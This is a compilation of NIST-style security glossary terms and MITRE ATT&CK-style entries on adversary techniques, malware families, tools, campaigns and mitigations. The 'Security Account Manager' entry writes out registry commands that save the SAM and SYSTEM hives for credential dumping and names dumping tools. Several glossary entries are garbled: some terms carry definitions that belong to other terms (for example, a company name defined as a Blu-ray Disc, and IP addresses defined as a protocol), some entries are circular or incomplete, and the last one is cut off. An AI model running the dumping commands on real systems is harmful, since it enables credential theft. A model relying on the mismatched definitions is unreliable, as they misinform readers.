Description: Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.

Term: task
Definition: Required, recommended, or permissible action intended to contribute to the achievement of one or more outcomes of a process.

Term: Image
Definition: A package that contains all the files required to run a container.

Name: Agrius
Type: intrusion-set
Description: Agrius is an Iranian threat actor active since 2020 notable for a series of ransomware and wiper operations in the Middle East, with an emphasis on Israeli targets. Public reporting has linked Agrius to Iran's Ministry of Intelligence and Security (MOIS).

Term: KMN
Definition: The activities involving the handling of cryptographic keys and other related security parameters (e.g., initialization vectors) during the entire lifecycle of the keys, including their generation, storage, establishment, entry and output, use and destruction.

Term: risk framing
Definition: Risk framing is the set of assumptions, constraints, risk tolerances, and priorities/trade-offs that shape an organization’s approach for managing risk.

Term: Publishing node
Definition: A node that, in addition to all responsibilities required of a full node, is tasked with extending the blockchain by creating and publishing new blocks. Also known as mining node, committing node, minting node.

Term: Trusted compute pool
Definition: A physical or logical grouping of computing hardware in a data center that is tagged with specific and varying security policies. Within a trusted compute pool, the access and execution of applications and workloads are monitored, controlled, audited, etc.

Term: FIPS 140 security level
Definition: A metric of the security provided by a cryptographic module that is specified as Level 1, 2, 3, or 4, as specified in [FIPS 140], where Level 1 is the lowest level, and Level 4 is the highest level.

Term: Triple Data Encryption Algorithm
Definition: The algorithm specified in FIPS PUB 46-3 –1999, Data Encryption Algorithm.

Term: Root Certificate Authority (CA)
Definition: In a hierarchical public key infrastructure (PKI), the certification authority (CA) whose public key serves as the most trusted datum (i.e., the beginning of trust paths) for a security domain.

Term: sanitization
Definition: Actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means.
Process to remove information from media such that data recovery is not possible. It includes removing all classified labels, markings, and activity logs.

Term: Static key pair
Definition: A long-term key pair for which the public key is often provided in a public-key certificate.

Term: accountability
Definition: 2. The security goal that generates the requirement for actions of an entity to be traced uniquely to that entity. This supports non-repudiation, deterrence, fault isolation, intrusion detection and prevention, and after-action recovery and legal action.

Term: sanitization
Definition: See sanitize.

Term: risk criteria
Definition: Terms of reference against which the significance of a risk is evaluated.

Term: MD
Definition: A digital signature that uniquely identifies data and has the property that changing a single bit in the data will cause a completely different message digest to be generated.

Term: common platform enumeration (CPE)
Definition: A nomenclature and dictionary of hardware, operating systems, and applications.

Term: quantum-vulnerable algorithm
Definition: A cryptographic algorithm that is believed to be secure against adversaries who possess only a classical computer but is known to be insecure against adversaries who possess a cryptanalytically relevant quantum computer.

Term: key pair
Definition: A public key and its corresponding private key; a key pair is used with a public-key algorithm.

Term: FCKMS module
Definition: A device that performs a set of key and metadata-management functions for at least one FCKMS and is associated with a cryptographic module. The device may be implemented as hardware, software, and/or firmware.

Name: UACMe
Type: tool
Description: UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.

Term: Market research
Definition: Collecting and analyzing information about capabilities within the market to satisfy agency needs.

Term: Originator
Definition: An entity that initiates an information exchange or storage event.

Term: OLIR Developer
Definition: A general term that includes: (i) developers or manufacturers of information systems, system components, or information system services; (ii) systems integrators; (iii) vendors; (iv) and product resellers. Development of systems, components, or services can occur internally within organizations (i.e., in-house development) or through external entities.

Term: NC
Definition: A time-varying value that has an acceptably small chance of repeating. For example, a nonce is a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: COMSEC incident
Definition: Any occurrence that potentially jeopardizes the security of COMSEC material or the secure transmission of national security information. COMSEC Incident includes Cryptographic Incident, Personnel Incident, Physical Incident, and Protective Technology/Package Incident.

Term: insider
Definition: Any person with authorized access to any U.S. Government resource, to include personnel, facilities, information, equipment, networks, or systems.

Term: General-purpose operating system
Definition: A host operating system that can be used to run many kinds of applications, not just applications in containers.

Term: Chief Privacy Officer
Definition: Person responsible for ensuring that an agency complies with privacy requirements, manages privacy risks, and considers the privacy impacts of all agency actions and policies that involve personal information.

Term: payload control center
Definition: A facility that provides C2 for satellite payloads.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties: 
One-way - It is computationally infeasible to find any input that maps to any pre-specified output; and 
Collision resistant - It is computationally infeasible to find any two distinct inputs that map to the same output.

Name: Develop Capabilities
Type: attack-pattern
Description: Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

Term: Sector
Definition: The smallest unit that can be accessed on media.

Term: computer security object
Definition: Information object used to maintain a condition of security in computerized environments.  Examples are: representations of computer or communications systems resources, security label semantics, modes of operation for cryptographic algorithms, and one-way hashing functions.

Name: Exfiltration Over Other Network Medium
Type: attack-pattern
Description: Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Term: KDK
Definition: A function that, with the input of a cryptographic key or shared secret, and possibly other data, generates a binary string, called keying material.

Term: key establishment
Definition: A procedure that results in secret keying material that is shared among different parties. Key agreement, using a KEM, and key transport are all types of key establishment.

Name: Execution Prevention
Type: course-of-action
Description: Prevent the execution of unauthorized or malicious code on systems by implementing application control, script blocking, and other execution prevention mechanisms. This ensures that only trusted and authorized code is executed, reducing the risk of malware and unauthorized actions. This mitigation can be implemented through the following measures:

Application Control:

- Use Case: Use tools like AppLocker or Windows Defender Application Control (WDAC) to create whitelists of authorized applications and block unauthorized ones. On Linux, use tools like SELinux or AppArmor to define mandatory access control policies for application execution.
- Implementation: Allow only digitally signed or pre-approved applications to execute on servers and endpoints. (e.g., `New-AppLockerPolicy -PolicyType Enforced -FilePath "C:\Policies\AppLocker.xml"`) 

Script Blocking:

- Use Case: Use script control mechanisms to block unauthorized execution of scripts, such as PowerShell or JavaScript. Web Browsers: Use browser extensions or settings to block JavaScript execution from untrusted sources.
- Implementation: Configure PowerShell to enforce Constrained Language Mode for non-administrator users. (e.g., `Set-ExecutionPolicy AllSigned`) 

Executable Blocking:

- Use Case: Prevent execution of binaries from suspicious locations, such as `%TEMP%` or `%APPDATA%` directories.
- Implementation: Block execution of `.exe`, `.bat`, or `.ps1` files from user-writable directories.

Dynamic Analysis Prevention:
- Use Case: Use behavior-based execution prevention tools to identify and block malicious activity in real time.
- Implemenation: Employ EDR solutions that analyze runtime behavior and block suspicious code execution.

Term: encryption
Definition: The process of transforming plaintext into ciphertext for the purpose of security or privacy.

Term: Trust Management
Definition: See Capability, Trust Management.

Name: MiniDuke
Type: malware
Description: MiniDuke is malware that was used by APT29 from 2010 to 2015. The MiniDuke toolset consists of multiple downloader and backdoor components. The loader has been used with other MiniDuke components as well as in conjunction with CosmicDuke and PinchDuke.

Name: Security Account Manager
Type: attack-pattern
Description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

* pwdumpx.exe
* gsecdump
* Mimikatz
* secretsdump.py

Alternatively, the SAM can be extracted from the Registry with Reg:

* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>

Creddump7 can then be used to process the SAM database locally to retrieve hashes.

Notes: 

* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.

Term: Key-establishment transaction
Definition: An execution of a key-establishment scheme. It can be either a key-agreement transaction or a key-transport transaction.

Term: ROA
Definition: A Route Origin Attestation is a cryptographically verifiable attestation that a given Internet prefix can be announced by an AS listed within the attestation.

Name: AdFind
Type: tool
Description: AdFind is a free command-line query tool that can be used for gathering information from Active Directory.

Term: Byte String
Definition: An array of integers in which each integer is in the set {0, … , 255}.

Name: Keylogging
Type: attack-pattern
Description: Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when OS Credential Dumping efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes. Some methods include:

* Hooking API callbacks used for processing keystrokes. Unlike Credential API Hooking, this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* Modify System Image may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.

Term: Master Terminal Unit (MTU)
Definition: See Control Server.

Term: Bit Error
Definition: The substitution of a ‘0’ bit for a ‘1’ bit, or vice versa.

Term: AS
Definition: An Autonomous System specifies a network, mostly an organization that can own or announce network addresses to the Internet.

Term: Sprawl
Definition: The proliferation of images.

Name: PowGoop
Type: malware
Description: PowGoop is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by MuddyWater as their main loader.

Name: Bazar
Type: malware
Description: Bazar is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. Bazar reportedly has ties to TrickBot campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.

Term: Symmetric Cryptography
Definition: Cryptography that uses the same key for both encryption and decryption.

Term: <em>Ctri</em>
Definition: The ith counter block.

Name: BBSRAT
Type: malware
Description: BBSRAT is malware with remote access tool functionality that has been used in targeted compromises.

Term: Cryptographic hash function
Definition: An algorithm that computes a numerical value (called the hash value) on a data file or electronic message that is used to represent that file or message, and depends on the entire contents of the file or message. A hash function can be considered to be a fingerprint of the file or message.

Name: ftp
Type: tool
Description: ftp is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.

Term: pseudorandom number generator
Definition: A random bit generator that includes a DRBG algorithm and (at least initially) has access to a source of randomness. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A cryptographic DRBG has the additional property that the output is unpredictable, given that the seed is not known. A DRBG is sometimes also called a Pseudo-random Number Generator (PRNG) or a deterministic random number generator.

Term: CM
Definition: A collection of activities focused on establishing and maintaining the integrity of information technology products and information systems, through control of processes for initializing, changing, and monitoring the configurations of those products and systems throughout the system development life cycle.

Name: UPPERCUT
Type: malware
Description: UPPERCUT is a 32-bit HTTP-based backdoor that has been used by menuPass since at least 2017. Once thought to be exclusive to menuPass, UPPERCUT was also observed being used by menuPass-associated MirrorFace during Operation AkaiRyū.

Term: Authentication Factor
Definition: The three types of authentication factors aresomething you know,something you have, andsomething you are. Every authenticator has one or more authentication factors.

Term: Security Authorization
Definition: See authorization.

Term: Suitability and Credentialing Executive Agent
Definition: Individual responsible for prescribing suitability standards and minimum standards of fitness for employment. With the issuance of Executive Order 13467, as amended, the Suitability and Credentialing Executive Agent is responsible for the development, implementation, and oversight of effective, efficient, and uniform policies and procedures governing the conduct of investigations and adjudications for Suitability, Fitness, and Credentialing determinations in the Federal Government. Pursuant to Sections 1103 and 1104 of Title 5, United States Code, and the Civil Service Rules, the director of the Office of Personnel Management (OPM) is the Suitability and Credentialing Executive Agent.

Name: Pre-compromise
Type: course-of-action
Description: Pre-compromise mitigations involve proactive measures and defenses implemented to prevent adversaries from successfully identifying and exploiting weaknesses during the Reconnaissance and Resource Development phases of an attack. These activities focus on reducing an organization's attack surface, identify adversarial preparation efforts, and increase the difficulty for attackers to conduct successful operations. This mitigation can be implemented through the following measures:

Limit Information Exposure:

- Regularly audit and sanitize publicly available data, including job posts, websites, and social media.
- Use tools like OSINT monitoring platforms (e.g., SpiderFoot, Recon-ng) to identify leaked information.

Protect Domain and DNS Infrastructure:

- Enable DNSSEC and use WHOIS privacy protection.
- Monitor for domain hijacking or lookalike domains using services like RiskIQ or DomainTools.

External Monitoring:

- Use tools like Shodan, Censys to monitor your external attack surface.
- Deploy external vulnerability scanners to proactively address weaknesses.

Threat Intelligence:

- Leverage platforms like MISP, Recorded Future, or Anomali to track adversarial infrastructure, tools, and activity.

Content and Email Protections:

- Use email security solutions like Proofpoint, Microsoft Defender for Office 365, or Mimecast.
- Enforce SPF/DKIM/DMARC policies to protect against email spoofing.

Training and Awareness:

- Educate employees on identifying phishing attempts, securing their social media, and avoiding information leaks.

Term: concept crosswalk
Definition: A concept relationship style that identifies that a relationship exists between two concepts without any additional characterization of that relationship.

Term: information system-related security risks
Definition: Information system-related security risks are those risks that arise through the loss of confidentiality, integrity, or availability of information or information systems and consider impacts to the organization (including assets, mission, functions, image, or reputation), individuals, other organizations, and the Nation. See Risk.

Term: defense-in-depth
Definition: Information security strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and missions of the organization.

Term: <em>Alphabet size</em>
Definition: The number of distinct symbols that the noise source produces.

Term: Personal Information Management (PIM) Data
Definition: The set of data types such as contacts, calendar entries, phonebook entries, notes, memos, and reminders maintained on a device, which may be synchronized with a personal computer.

Term: system-related privacy risk
Definition: Risk to an individual or individuals associated with the agency’s creation, collection, use, processing, storage, maintenance, dissemination, disclosure, and disposal of their PII.

Name: TYPEFRAME
Type: malware
Description: TYPEFRAME is a remote access tool that has been used by Lazarus Group.

Term: cryptographic erase
Definition: A method of Sanitization in which the Media Encryption Key(MEK) for the encryptedTarget Data (or the KeyEncryption Key–KEK) is sanitized, making recovery of the decrypted Target Data infeasible.

Name: SNMP (MIB Dump)
Type: attack-pattern
Description: Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages. The MIB may also contain device operational information, including running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.

Name: Operation Honeybee
Type: campaign
Description: Operation Honeybee was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. Operation Honeybee initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign "Honeybee" after the author name discovered in malicious Word documents.

Name: Valak
Type: malware
Description: Valak is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.

Term: security authorization (to operate)
Definition: See Authorization (to operate).

Name: Cryptoistic
Type: malware
Description: Cryptoistic is a backdoor, written in Swift, that has been used by Lazarus Group.

Term: secret key
Definition: A single cryptographic key that is used with a secret (symmetric) key algorithm.

Term: Registry
Definition: An authoritative, centrally-controlled store of information. Web services use registries to advertise their existence and to describe their interfaces and other attributes. Prospective clients query registries to locate required services and to discover their attributes.

Term: NC
Definition: A time-varying value that has at most a negligible chance of repeating; for example, a random value that is generated anew for each use, a time-stamp, a sequence number, or some combination of these. It can be a secret or non-secret value.

Term: inverse transformation
Definition: The inverse of the permutation of blocks that is determined by the choice of a block cipher and a key.

Term: approved
Definition: FIPS-Approved and/or NIST-recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation and specified either in an appendix to the FIPS or NIST Recommendation, or in a document referenced by the FIPS or NIST Recommendation.

Term: hash digest
Definition: The output of a hash function (e.g., hash(data) = digest). Also known as a message digest, digest or harsh value. The number of cryptographic has functions a processor can calculate in a given time, usually denominated as hashes per second.

Term: categorization
Definition: The process of determining the security category for information or a system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS Publication 199 for other than national security systems. See security category.

Name: DUSTPAN
Type: malware
Description: DUSTPAN is an in-memory dropper written in C/C++ used by APT41 since 2021 that decrypts and executes an embedded payload.

Name: Search Open Technical Databases
Type: attack-pattern
Description: Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.

Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).

Term: identify (CSF function)
Definition: The bit string denoting the identifier associated with an entity.

Term: Independent Regulatory Agency
Definition: The Board of Governors of the Federal Reserve System, the Commodity Futures Trading Commission, the Consumer Product Safety Commission, the Federal Communications Commission, the Federal Deposit Insurance Corporation, the Federal Energy Regulatory Commission, the Federal Housing Finance Board, the Federal Maritime Commission, the Federal Trade Commission, the Interstate Commerce Commission, the Mine Enforcement Safety and Health Review Commission, the National Labor Relations Board, the Nuclear Regulatory Commission, the Occupational Safety and Health Review Commission, the Postal Rate Commission, the Securities and Exchange Commission, and any other similar agency designated by statute as a Federal independent regulatory agency or commission.

Term: block
Definition: A subset of a bit string. A block has a predetermined length.

Name: MoleNet
Type: malware
Description: MoleNet is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.

Term: <em>Security boundary</em>
Definition: A conceptual boundary that is used to assess the amount of entropy provided by the values output from an entropy source. The entropy assessment is performed under the assumption that any observer (including any adversary) is outside of that boundary.

Term: Becton, Dickinson and Company
Definition: A Blu-ray Disc(BD) hasthe same shape and size as a CD or DVD,but has a higher density and gives the option for data to be multi-layered.

Term: Metadata (implicit)
Definition: Information about a cryptographic key that may be inferred (i.e., by context), but is not explicitly recorded, managed, or protected by the CKMS.

Name: CrossRAT
Type: malware
Description: CrossRAT is a cross platform RAT.

Term: Access Control Policy
Definition: High-level requirements that specify how access is managed and who may access information under what circumstances.

Name: Domains
Type: attack-pattern
Description: Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for Phishing, Drive-by Compromise, and Command and Control. Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD). Typosquatting may be used to aid in delivery of payloads via Drive-by Compromise. Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.

Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.

In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.

Term: name
Definition: A unique identifier associated with a registered object. This register assigns two of names, a numeric name and an alpha-numeric name, to each object.

Term: TECB
Definition: TDEA Electronic Codebook Mode of Operation

Term: nonce
Definition: A time-varying value that has, at most, an acceptably small chance of repeating. For example, a nonce is a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: Installation (as used herein)
Definition: Any of the following actions: - Executing an installer to load software. - Listing Software in the operating system software directory. - (Merely) placing executable software on a medium from which it can be executed, even if no installer software is run and there is no listing for it in the operating system software directory. - Any other action that allows an executable software file to be loaded into the CPU (e.g., browsing a website that downloads software; opening an e-mail (or attachment) that downloads software; etc.).

Name: Impersonation
Type: attack-pattern
Description: Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via Phishing for Information, Phishing, or Internal Spearphishing) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims.

In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables Financial Theft.

Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.  

Impersonation is typically preceded by reconnaissance techniques such as Gather Victim Identity Information and Gather Victim Org Information as well as acquiring infrastructure such as email domains (i.e. Domains) to substantiate their false identity.

There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may Compromise Accounts targeting one organization which can then be used to support impersonation against other entities.

Term: common control
Definition: A security control that is inheritable by one or more organizational information systems. See Security Control Inheritance.

Name: RedDelta Modified PlugX Infection Chain Operations
Type: campaign
Description: RedDelta Modified PlugX Infection Chain Operations was executed by Mustang Panda from mid-2023 through the end of 2024 against multiple entities in East and Southeast Asia. RedDelta Modified PlugX Infection Chain Operations involved phishing to deliver malicious files or links to users prompting follow-on installer downloads to load PlugX on victim machines in a persistent state.

Term: control assessment report
Definition: See control assessment report.

Term: NIST Checklist Repository
Definition: The website that maintains the checklists, the descriptions of the checklists, and other information regarding the National Checklist Program. Also known as the repository. https://checklists.nist.gov

Term: PRF
Definition: A function that can be used to generate output from a secret random seed and a data variable, such that the output is computationally indistinguishable from truly random output. In this Recommendation, an approved message authentication code (MAC) is used as a pseudorandom function in the key expansion step, where a key derivation key is used as the secret random seed.

Term: Probability Density Function (PDF)
Definition: A function that provides the "local" probability distribution of a test statistic. From a finite sample size n, a probability density function will be approximated by a histogram.

Term: Recovery Time Objective
Definition: The overall length of time an information system’s components can be in the recovery phase before negatively impacting the organization’s mission or mission/business processes.

Term: control parameter
Definition: The variable part of a control or control enhancement that is instantiated by an organization during the tailoring process by either assigning an organization-defined value or selecting a value from a predefined list provided as part of the control or control enhancement. See assignment operation and selection operation.

Term: hash function
Definition: <p>A function on bit strings in which the length of the output is fixed. Approved hash functions (such as those specified in FIPS 180 and FIPS 202) are designed to satisfy the following properties:</p><p>1. (One-way) It is computationally infeasible to find any input that maps to any new pre-specified output.</p><p>2. (Collision-resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.</p>

Term: security control assessment
Definition: An evidence-based evaluation and judgement on the nature, characteristics, quality, effectiveness, intent, impact, or capabilities of an item, organization, group, policy, activity, or person. Note: Assessments are generally informational in nature and used to support decision making and to inform formal inspections or audits. Assessments may consider information garnered from past audits, inspections, risk analyses, incident reports, intelligence collection, and other related activities, but are considered separate from these activities.

Name: Hannotog
Type: malware
Description: Hannotog is a type of backdoor malware uniquely assoicated with Lotus Blossom operations since at least 2022.

Name: OLDBAIT
Type: malware
Description: OLDBAIT is a credential harvester used by APT28.

Term: informational label
Definition: Provides facts about properties or features of a product without any grading or evaluation. Information may be displayed in a variety of ways, such as in tabular format or with icons or text.

Term: Authentication Header (AH)
Definition: A deprecated IPsec security protocol that provides integrity protection (but not confidentiality) for packet headers and data.

Term: Cryptographic module
Definition: The set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic module boundary. See [FIPS 140].

Term: Enhanced Messaging Service (EMS)
Definition: an improved message system for GSM mobile phones allowing picture, sound, animation and text elements to be conveyed through one or more concatenated SMS messages.

Name: NBTscan
Type: tool
Description: NBTscan is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.

Term: event‐level privacy
Definition: A unit of privacy that defines neighboring databases as those that differ in one event, for example, a single transaction, or a single row.

Term: domain
Definition: A domain within which behaviors, interactions, and outcomes occur and that is defined by a governing security policy.  
Note: A security domain is defined by rules for users, processes, systems, and services that apply to activity within the domain and activity with similar entities in other domains.

Term: authenticate
Definition: <p>The process by which a claimant proves possession and control of one or more authenticators bound to a subscriber account to demonstrate that they are the subscriber associated with that account and involves one or more of the following factors:</p><p>i. something you know (e.g., password/personal identification number (PIN) );</p><p>ii. something you have (e.g., cryptographic identification device, token); or</p><p>iii. something you are (e.g., biometric).</p>

Term: Additional Authenticated Data
Definition: The input data to the authenticated encryption function that is authenticated but not encrypted.

Term: assurance
Definition: Grounds for justified confidence that a claim has been or will be achieved.
Note 1: Assurance is typically obtained relative to a set of specific claims. The scope and focus of such claims may vary (e.g., security claims, safety claims) and the claims themselves may be interrelated.
Note 2: Assurance is obtained through techniques and methods that generate credible evidence to substantiate claims.

Term: Modular Contracting
Definition: Under modular contracting, an executive agency’s need for a system is satisfied in successive acquisitions of interoperable increments. Each increment complies with common or commercially accepted standards applicable to information technology so that the increments are compatible with other increments of information technology composing the system.

Term: CVE
Definition: A dictionary of common names for publicly known information system vulnerabilities.

Term: Mode of Operation (Mode)
Definition: An algorithm for the cryptographic transformation of data that is based on a block cipher.

Term: common secure configuration
Definition: Recognized, standardized, and established benchmarks that stipulate secure configuration settings for specific information technology platforms/products and instructions for configuring those system components to meet operational requirements. These benchmarks are also referred to as security configuration checklists, lockdown and hardening guides, security reference guides, and security technical implementation guides.

Name: Messaging Applications
Type: attack-pattern
Description: Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information. 

The following is a brief list of example information that may hold potential value to an adversary and may also be found on messaging applications: 

* Testing / development credentials (i.e., Chat Messages) 
* Source code snippets 
* Links to network shares and other internal resources 
* Proprietary data
* Discussions about ongoing incident response efforts

In addition to exfiltrating data from messaging applications, adversaries may leverage data from chat messages in order to improve their targeting - for example, by learning more about an environment or evading ongoing incident response efforts.

Term: viewpoint
Definition: Specification of the conventions for constructing and using a view.

Term: digital identity
Definition: The unique representation of a subject engaged in an online transaction. A digital identity is always unique in the context of a digital service, but does not necessarily need to uniquely identify the subject in all contexts. In other words, accessing a digital service may not mean that the subject’s real-life identity is known.

Term: truncation
Definition: A process that shortens an input bitstring, preserving only a sub-string of a specified length.

Term: baseline
Definition: Formally approved version of a configuration item, regardless of media, formally designated and fixed at a specific time during the configuration item's life cycle.
Note: The engineering process generates many artifacts that are maintained as a baseline over the course of the engineering effort and after its completion. The configuration control processes of the engineering effort manage baselined artifacts. Examples include stakeholder requirements baseline, system requirements baseline, architecture/design baseline, and configuration baseline.

Term: Internet Protocol (IP) addresses
Definition: Standard protocol for transmission of data from source to destinations in packet-switched communications networks and interconnected systems of such networks.

Term: Non-Technical Supporting Capability
Definition: Non-technical supporting capabilities are actions an organization performs in support of the cybersecurity of a product.

Term: High-Value Asset
Definition: A designation of federal information or a federal information system when it relates to one or more of the following categories:

Term: control enhancement
Definition: Augmentation of a control to build in additional, but related, functionality to the control; increase the strength of the control; or add assurance to the control.

Name: WARPWIRE
Type: malware
Description: WARPWIRE is a Javascript credential stealer that targets plaintext passwords and usernames for exfiltration that was used during Cutting Edge to target Ivanti Connect Secure VPNs.

Name: J-magic Campaign
Type: campaign
Description: The J-magic Campaign was active from mid-2023 to at least mid-2024 and featured the use of the J-magic backdoor, a custom cd00r variant tailored for use against Juniper routers. The J-magic Campaign targeted Junos OS routers serving as VPN gateways primarily in the semiconductor, energy, manufacturing, and IT sectors.

Term: Extended Validation Certificate
Definition: A certificate used for https websites and software that includes identity information, subjected to an identity verification process standardized by the CA Browser Forum in its Baseline Requirements which verifies the identified owner of the website for which the certificate has been issued has exclusive rights to use the domain; exists legally, operationally, and physically; and has authorized issuance of the certificate.

Term: Asymmetric-key cryptography
Definition: See Asymmetric-key cryptography.

Term: cryptology
Definition: Originally the field encompassing both cryptography and cryptanalysis. Today, cryptology in the U.S. Government is the collection and/or exploitation of foreign communications and non- communications emitters, known as SIGINT; and solutions, products, and services, to ensure the availability, integrity, authentication, confidentiality, and non-repudiation of national security telecommunications and information systems, known as IA.

Term: Contingency Planning
Definition: See Information System Contingency Plan.

Term: bit string
Definition: A sequence of bits.

Term: internal network
Definition: A network in which the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors or in which the cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints provides the same effect (with regard to confidentiality and integrity). An internal network is typically organization-owned yet may be organization-controlled while not being organization-owned.

Term: accreditation
Definition: See Accreditation.

Term: Pharming
Definition: An attack in which an Attacker corrupts an infrastructure service such as DNS (Domain Name Service) causing the Subscriber to be misdirected to a forged Verifier/RP, which could cause the Subscriber to reveal sensitive information, download harmful software or contribute to a fraudulent act.

Term: certificate revocation list (CRL)
Definition: These are digitally signed “blacklists” of revoked certificates. Certification authorities (CAs) periodically issue certificate revocation lists (CRLs), and users can retrieve them on demand via repositories.

Term: MacOutputLen
Definition: The byte length of the MAC output block.

Term: High Availability
Definition: A failover feature to ensure availability during device or component interruptions.

Name: Hydraq
Type: malware
Description: Hydraq is a data-theft trojan first used by Elderwood in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including APT17.

Term: SCAP use case
Definition: A pre-defined way in which a product can use SCAP. See Section 5 for the definitions of the SCAP use cases.

Term: spyware
Definition: A program embedded within an application that collects information and periodically communicates back to its home site, unbeknownst to the user.

Term: CIO
